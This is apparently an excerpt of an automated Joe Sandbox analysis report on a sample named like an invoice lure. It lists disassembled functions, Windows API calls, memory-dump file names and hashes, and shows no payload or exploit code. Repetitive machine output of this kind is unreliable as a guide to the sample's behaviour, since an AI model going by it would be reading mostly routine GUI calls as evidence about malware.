Opcode Fuzzy Hash: 80c4bc02d440aa07794f9b0bebc28d92511f558d35d7e2c22487967b95a09c8a
Instruction Fuzzy Hash: 94518171900119DBCF259F64CC41EEAB7F6EF05310F1442E9B958A7291EB709E918FA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BEACDB, Relevance: 6.1, APIs: 4, Instructions: 144COMMON

Download Yara Rule

APIs

InflateRect.USER32(?,000000FF,000000FF), ref: 00BEADBA
InflateRect.USER32(?,000000FF,000000FF), ref: 00BEAE27
InflateRect.USER32(?,000000FE,000000FE), ref: 00BEAE65

Part of subcall function 00BD8CDD: __EH_prolog3.LIBCMT ref: 00BD8CE4

InflateRect.USER32(?,000000FE,000000FE), ref: 00BEAE97

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: InflateRect$H_prolog3
String ID:
API String ID: 3346915232-0
Opcode ID: 1fe049838ad78cfe895e23a9747e9872f4ecf61f50b1ad02d2a03e6ce8d3f16f
Instruction ID: 4534b6ae59fc71a6983e1358cbd847600f6416d79e6f7ef8398c8f9add9248dd
Opcode Fuzzy Hash: 1fe049838ad78cfe895e23a9747e9872f4ecf61f50b1ad02d2a03e6ce8d3f16f
Instruction Fuzzy Hash: 75514E35504254EFCF10DB29C984BAE77E9EF46321F2446E9E836A72D1DB70AD40CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00BE29E5, Relevance: 6.1, APIs: 4, Instructions: 142timeCOMMON

Download Yara Rule

APIs

__cftof.LIBCMT ref: 00BE2A19
GetFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00BE2A43
GetFileSizeEx.KERNEL32(?,?,?,?,?,?,?,00000000,?), ref: 00BE2A58
GetFileAttributesA.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 00BE2A96

Part of subcall function 00BE2689: GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,00BE2BC5,?,00000000,?,?), ref: 00BE26A0
Part of subcall function 00BE2689: GetProcAddress.KERNEL32(00000000,GetFileAttributesTransactedA), ref: 00BE26B0

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: File$AddressAttributesHandleModuleProcSizeTime__cftof
String ID:
API String ID: 1357347825-0
Opcode ID: 33038d8c13b5695ad050cc8c272f377079bdfedc7c96d10e2290b305ec18c1ce
Instruction ID: b0f76e044259c852157155c1144c586266a0bd3d76eae1fdcf562bfc90ce484a
Opcode Fuzzy Hash: 33038d8c13b5695ad050cc8c272f377079bdfedc7c96d10e2290b305ec18c1ce
Instruction Fuzzy Hash: F5515A71A00248DFCB24DFA6C885CAAB7FDFF483107144A6EE556D7291EB70E904CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BD873C, Relevance: 6.1, APIs: 4, Instructions: 137windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BD8743
CopyRect.USER32 ref: 00BD8769
SendMessageA.USER32(?,00000199,?,00000000), ref: 00BD877A

Part of subcall function 00BDD5E2: SendMessageA.USER32(?,00000476,00000000,00000000), ref: 00BDD5F6

Part of subcall function 00BB4678: SetBkMode.GDI32(?,?), ref: 00BB468C
Part of subcall function 00BB4678: SetBkMode.GDI32(?,?), ref: 00BB469E

InflateRect.USER32(?,000000F6,00000000), ref: 00BD8864

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: MessageModeRectSend$CopyH_prolog3_Inflate
String ID:
API String ID: 2791430660-0
Opcode ID: aea7af428b4c7226dfddfb24b88a6f1ccefb2affae0137c9af44e7465b27a04b
Instruction ID: a8d609a7f039e191ecf032fbe826a608f11c41d1e9edbda587ed63fb0d22479a
Opcode Fuzzy Hash: aea7af428b4c7226dfddfb24b88a6f1ccefb2affae0137c9af44e7465b27a04b
Instruction Fuzzy Hash: 8D511732D01228EFCF05EFA4D844AAEBBB6FF49321F150159E905A7390DB716D01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00BFEF6C, Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BFEF73

Part of subcall function 00BB25F0: __EH_prolog3.LIBCMT ref: 00BB25F7
Part of subcall function 00BB25F0: BeginPaint.USER32(?,?,00000004,00BAC6A5,?,00000058,00BA2A22), ref: 00BB2623

FillRect.USER32 ref: 00BFEFA5
InflateRect.USER32(?,000000FB,00000000), ref: 00BFEFD5
GetParent.USER32(?), ref: 00BFF04C

Part of subcall function 00BF5141: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00BF514A

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Rect$BeginFillH_prolog3H_prolog3_InflateMessagePaintParentSend
String ID:
API String ID: 1694966241-0
Opcode ID: 34f98cda255ea57c081f98eb6e2f8b1f54769c436000c71d7c0a09c6fae14448
Instruction ID: 73851e365bae1eff7208a1114693c961400eb808330f797775f0a30009e75e2b
Opcode Fuzzy Hash: 34f98cda255ea57c081f98eb6e2f8b1f54769c436000c71d7c0a09c6fae14448
Instruction Fuzzy Hash: 68416D71500109DBDF25EBB4C995EFE77F9EF44300F2405B9AA16AB2A3DF609909CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BEC654, Relevance: 6.1, APIs: 4, Instructions: 135COMMON

Download Yara Rule

APIs

GetObjectA.GDI32(?,00000018,?), ref: 00BEC6EC
DeleteObject.GDI32(00000000), ref: 00BEC7B6
DeleteObject.GDI32(00000000), ref: 00BEC7BF
DeleteObject.GDI32(00000000), ref: 00BEC7CE

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Object$Delete
String ID:
API String ID: 774837909-0
Opcode ID: 87c71970c21a9594f72bac36383880e8900b788b9fc84e6af0e97e79a934ff08
Instruction ID: 91aba49ebecf2fe1f34078add47d32790c0d4a0cd973887b4db715264e6a02a1
Opcode Fuzzy Hash: 87c71970c21a9594f72bac36383880e8900b788b9fc84e6af0e97e79a934ff08
Instruction Fuzzy Hash: 2E416D72900289DBDF20DF6AC885BEEBBF5EB44341F1485A6E911A7280D774CD82DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00C4417A, Relevance: 6.1, APIs: 4, Instructions: 132COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32 ref: 00C4424F
SetRectEmpty.USER32 ref: 00C4425C
SetRectEmpty.USER32 ref: 00C4431A
SetRectEmpty.USER32 ref: 00C44379

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: EmptyRect
String ID:
API String ID: 2270935405-0
Opcode ID: 5577f0b2b056c75a0cf31fecb45bde836da7891d733fd153518a81f05eda64dc
Instruction ID: af8f06cba7c7b6762734c116b45529fecfe24f003d4ebabc5c02d86fed5c83a5
Opcode Fuzzy Hash: 5577f0b2b056c75a0cf31fecb45bde836da7891d733fd153518a81f05eda64dc
Instruction Fuzzy Hash: F051D0B0821625CFCB649F2984846E53BE8BB09B11F1842BBED1CCF65ACBB01541DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BDA721, Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BDA728
LoadImageW.USER32 ref: 00BDA775
GetObjectA.GDI32(00000000,00000018,?), ref: 00BDA7AC
DeleteObject.GDI32(00000000), ref: 00BDA85B

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Object$DeleteH_prolog3ImageLoad
String ID:
API String ID: 91933946-0
Opcode ID: 42c5427ef92c97a0fb62d32b5125e1ec59b851e684ad7f5b017968d679627498
Instruction ID: b9b059f39665e53b27accc34c616df168df0c810ed922b9aee647dc2a1b7d262
Opcode Fuzzy Hash: 42c5427ef92c97a0fb62d32b5125e1ec59b851e684ad7f5b017968d679627498
Instruction Fuzzy Hash: 37418D328102169BDB10AF65CC959EEB7F4EF49324B150A96E821F32D1EB34AD41D7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00BF68B9, Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BF68C0

Part of subcall function 00BFFE2C: __EH_prolog3.LIBCMT ref: 00BFFE33
Part of subcall function 00BFFE2C: GetClientRect.USER32 ref: 00BFFE82

GetClientRect.USER32 ref: 00BF691E
InflateRect.USER32(?,000000FF,000000FF), ref: 00BF69B7
SelectObject.GDI32(00000000,?), ref: 00BF69EC

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Rect$Client$H_prolog3H_prolog3_InflateObjectSelect
String ID:
API String ID: 3664266300-0
Opcode ID: 0e577b3b7e906275e6c645a36e7fa429293c21c00f006ae77ff57fa26ec8abca
Instruction ID: 8716d38758c9b392076398ee2f20f55feb48897af4b7efea9dbf8e1394392a37
Opcode Fuzzy Hash: 0e577b3b7e906275e6c645a36e7fa429293c21c00f006ae77ff57fa26ec8abca
Instruction Fuzzy Hash: F2413831A00619DFCF01EFA8C884AEEBBB6FF49310F140169E905AB351DB75A905CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BC45F0, Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,00000001,00000000,00000000), ref: 00BC4682
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,00000001,00000000,00000000), ref: 00BC4698
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,00000001,00000000,00000000), ref: 00BC46AE
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,00000001,00000000,00000000), ref: 00BC46C4

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 5e2517068539796feb128f9325a1c0667bc94d12efeb8b6b2cb91594d0308851
Instruction ID: 058b3c4ff08b5a356046d92ed47f783f8ba1dfa75d4ecd1f262a0b26c431b942
Opcode Fuzzy Hash: 5e2517068539796feb128f9325a1c0667bc94d12efeb8b6b2cb91594d0308851
Instruction Fuzzy Hash: 8F2160F2111214BFEB18AB71DC9AEFB379CEF19711705026EF906C6645EB60EA0486B4

Uniqueness

Uniqueness Score: -1.00%

Function 00BF4AC1, Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32 ref: 00BF4B48
RedrawWindow.USER32(?,?,00000000,00000105), ref: 00BF4B5D
IsRectEmpty.USER32(?), ref: 00BF4BB5
RedrawWindow.USER32(?,?,00000000,00000105), ref: 00BF4BE1

Part of subcall function 00BF4BF8: RedrawWindow.USER32(00000000,?,00000000,00000105), ref: 00BF4C6C

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: RedrawWindow$EmptyRect
String ID:
API String ID: 138230908-0
Opcode ID: f5bd06f8af2d972fb57e46c743c66f3eb294c4d7d6a63d199a89a29451b51c61
Instruction ID: 6af939f77b879a38e0848c6a98c4016a0fb5d351bf2863db34fae07b4b738834
Opcode Fuzzy Hash: f5bd06f8af2d972fb57e46c743c66f3eb294c4d7d6a63d199a89a29451b51c61
Instruction Fuzzy Hash: C7416C75A00619DBDB01DF64C884BFFB7B9EF48300F1441A9EE05EB252C770AA49CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BE4340, Relevance: 6.1, APIs: 4, Instructions: 107windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BE4347
PathFindExtensionA.SHLWAPI(?,000000FF), ref: 00BE43AC
GetParent.USER32(?), ref: 00BE4433
SendMessageA.USER32(?,00000464,00000104,00000000), ref: 00BE4449

Part of subcall function 00BE44A7: __EH_prolog3.LIBCMT ref: 00BE44AE
Part of subcall function 00BE44A7: CoTaskMemFree.OLE32(?), ref: 00BE44FC

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: H_prolog3$ExtensionFindFreeMessageParentPathSendTask
String ID:
API String ID: 3379981378-0
Opcode ID: 88099bd714a252b73f1b4b2c251f9e6d10e3a58e8df4c250d8af05e528da92bd
Instruction ID: 810cf78f5297977239f6a6baaf27587847c354ef9c36ee707fc884e6944a3e1d
Opcode Fuzzy Hash: 88099bd714a252b73f1b4b2c251f9e6d10e3a58e8df4c250d8af05e528da92bd
Instruction Fuzzy Hash: 0B41CC70A04296DBCB18EFA1C985ABEB7F4FF05310F1406A8A5616B2C1DF709904DB64

Uniqueness

Uniqueness Score: -1.00%

Function 00BBED7C, Relevance: 6.1, APIs: 4, Instructions: 101windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 00BBEDA9
SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 00BBEE0A
SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 00BBEE54
SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 00BBEE83

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 34365db052a1736358e4ed34a5fd2ab28e6b77b7450001ae9f04a2041e67d0f5
Instruction ID: 851fe84072423299150406a13005b0017bc40dec9f3fd35a4237e5032ba10712
Opcode Fuzzy Hash: 34365db052a1736358e4ed34a5fd2ab28e6b77b7450001ae9f04a2041e67d0f5
Instruction Fuzzy Hash: B4316C70A4060AEFEB259A64C894BFA73E9EB00344F1441BDE512A32A1CBB1EE41D661

Uniqueness

Uniqueness Score: -1.00%

Function 00BB6688, Relevance: 6.1, APIs: 4, Instructions: 100COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32 ref: 00BB6694
GetClientRect.USER32 ref: 00BB66B4
GetParent.USER32(?), ref: 00BB66D3
OffsetRect.USER32(00000000,00000000,00000000), ref: 00BB6755

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Rect$ClientEmptyOffsetParent
String ID:
API String ID: 3819956977-0
Opcode ID: c4a1e63c9085b0ae7ae4a227ac089e84b49f58080f0e28e5e72322afdc2e9800
Instruction ID: 2286d745bf99510ccb228cb4fa494b6e1b8703714519e5c1133d40076d039de2
Opcode Fuzzy Hash: c4a1e63c9085b0ae7ae4a227ac089e84b49f58080f0e28e5e72322afdc2e9800
Instruction Fuzzy Hash: C0319275200602EFD7188F66C885EB5B7E5FF44724B1482ADE919CB291EFA4EC40CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BFC83B, Relevance: 6.1, APIs: 4, Instructions: 94windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00BFC877
SHGetDesktopFolder.SHELL32(?), ref: 00BFC8BE
SHGetPathFromIDListA.SHELL32(?,?,?,?,00000000,00DF6DC4,?), ref: 00BFC8F4
_strlen.LIBCMT ref: 00BFC905

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: DesktopFolderFromListMessagePathSend_strlen
String ID:
API String ID: 399218604-0
Opcode ID: 987d461c8c1d2c152c8b2b4452f2a2498c8fd27d9bc67bb11e911fa8ef4b7138
Instruction ID: 1a262360e5d9278fc87fa203f6e1133cabd1a39089016c702b2b011e7b06a7fc
Opcode Fuzzy Hash: 987d461c8c1d2c152c8b2b4452f2a2498c8fd27d9bc67bb11e911fa8ef4b7138
Instruction Fuzzy Hash: C3316131A0021CDFCB15DF65CD85AFA7BE8EB94700B0081E9AA45E7251DBB0DD848B60

Uniqueness

Uniqueness Score: -1.00%

Function 00BE44A7, Relevance: 6.1, APIs: 4, Instructions: 91windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BE44AE
CoTaskMemFree.OLE32(?), ref: 00BE44FC
GetParent.USER32(?), ref: 00BE4546
SendMessageA.USER32(?,00000464,00000104,00000000), ref: 00BE456C

Part of subcall function 00BA3A52: __EH_prolog3.LIBCMT ref: 00BA3A59

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: H_prolog3$FreeMessageParentSendTask
String ID:
API String ID: 2222212998-0
Opcode ID: 9bd40fdfb8ecba54e5345ebf1d3f7ae29c5d84bfeea4be922937388aa167af9a
Instruction ID: 14c3d6a33c24862e50c35b68abd35af76d2a0174f519ba1ed882a01ef4fc4c44
Opcode Fuzzy Hash: 9bd40fdfb8ecba54e5345ebf1d3f7ae29c5d84bfeea4be922937388aa167af9a
Instruction Fuzzy Hash: 2F316B71A00616EBCF04EFA4CC859AEB7F4FF55324B1406A9B565A72E1DB30AD04CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00BEEED7, Relevance: 6.1, APIs: 4, Instructions: 87COMMON

Download Yara Rule

APIs

GetObjectA.GDI32(00000000,00000018,?), ref: 00BEEF1B
CopyImage.USER32 ref: 00BEEF78
DeleteObject.GDI32(00000000), ref: 00BEEFA1
DeleteObject.GDI32(00000000), ref: 00BEEFB5

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Object$Delete$CopyImage
String ID:
API String ID: 251616256-0
Opcode ID: 7fd0fcdb1d2d02b1528df410edc783c1c9ca29c90000527780ff0b5ac6cdd497
Instruction ID: fc43920eb904081edbb281fff1b84ac82ba2dbad746bda6696055e5c309dbb63
Opcode Fuzzy Hash: 7fd0fcdb1d2d02b1528df410edc783c1c9ca29c90000527780ff0b5ac6cdd497
